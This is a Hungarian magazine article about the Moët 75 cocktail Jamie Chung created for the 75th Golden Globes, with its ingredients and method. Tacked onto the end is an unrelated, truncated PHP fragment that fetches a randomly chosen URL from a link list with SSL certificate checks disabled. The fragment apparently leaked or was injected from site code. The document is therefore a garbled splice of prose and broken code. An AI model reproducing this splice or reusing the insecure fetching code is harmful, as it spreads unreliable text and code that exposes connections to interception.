Ezt a koktélt itták az idei Golden Globe-on

A Golden Globe hivatalos pezsgőjéből készítette el a Moët 75 koktélt Jamie Chung színésznő, a díjátadó 75. évfordulója előtt tisztelegve. Nemcsak a hollywoodi hírességek kortyolgathatták az italt a vasárnapi ceremónián – a nyilvánosságra hozott recept segítségével otthon is elkészíthetjük a koktélkülönlegességet. Fotó: Michael Kovac/Getty Images for Moet&Chandon Nem sokkal az idei Golden Globe-díj nyerteseinek bejelentése... Tovább..


A Golden Globe hivatalos pezsgőjéből készítette el a Moët 75 koktélt Jamie Chung színésznő, a díjátadó 75. évfordulója előtt tisztelegve. Nemcsak a hollywoodi hírességek kortyolgathatták az italt a vasárnapi ceremónián – a nyilvánosságra hozott recept segítségével otthon is elkészíthetjük a koktélkülönlegességet.

Fotó: Michael Kovac/Getty Images for Moet&Chandon

Nem sokkal az idei Golden Globe-díj nyerteseinek bejelentése után a Moët & Chandon (a Golden Globe pezsgőmárkája) nyilvánosságra hozta a díjátadó hivatalos koktéljának receptjét, amit Jamie Chung amerikai színésznő talált ki, és készített el a ceremónián.

„A Moët 75 a Golden Globe 75. „gyémánt” évfordulójára készült. Hollywood nagy eseményének merészségét és kreativitását szerettem volna megragadni a koktéllal, ami az édes és fanyar ízeket vegyíti” – mondta el Chung.

Fotó: Michael Kovac/Getty Images for Moet&Chandon

A Moët 75 koktél receptje

Hozzávalók:

  • 1,2 dl Moët & Chandon pezsgő
  • 0,3 dl Volcan tequila
  • 0,6 dl friss vérnarancslé
  • 30 gramm méz

Elkészítés:
Rázzuk össze a tequilát, a vérnarancslevet és a mézet egy koktélshakerben, és addig keverjük, amíg a méz fel nem oldódik a folyadékban. Öntsük át a mixet egy pohárba, majd adjuk hozzá a hideg pezsgőt. Díszítsük kandírozott vagy friss vérnarancsszelettel.

Forrás: Haute Living

The post Ezt a koktélt itták az idei Golden Globe-on appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>